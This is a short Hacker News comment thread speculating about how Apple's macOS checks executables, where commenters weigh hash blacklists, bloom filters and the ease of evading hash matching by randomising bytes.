←back to thread

361 points robenkleene | 3 comments | | HN request time: 0.45s | source
Show context
londons_explore ◴[] No.23282990[source]
This must be a blacklist, since it doesn't block my own random scripts which it has never seen before.

If it's a global blacklist on apple servers, it should instead be downloaded to the client, and be a local blacklist.

Too big? Use a bloom filter. Now you only end up keeping less than one byte per blacklisted item. Update the bloom filter with an autoupdater. Any positive hit you can check against the server just incase it's a false positive.

replies(3): >>23283287 #>>23283550 #>>23283950 #
1. caf ◴[] No.23283950[source]
Doesn't a blacklist also work only until the malware authors figure out how to randomize 8 junk bytes every time they serve an executable?
replies(2): >>23285266 #>>23285447 #
2. therein ◴[] No.23285266[source]
Which they already do.
3. dimator ◴[] No.23285447[source]
That's the crazy thing about this. There's already obfuscation techniques against hash blacklists, so what is this even for? There's no earthly way apple security engineers didn't know that. So what is actually happening?

My guess is that it's strictly for banning app store apps that they pull from the app store, but would like also to cripple retroactively on installed machines. But that doesn't explain why it had to run against random shell scripts? This is all still confusing. We don't have all the info.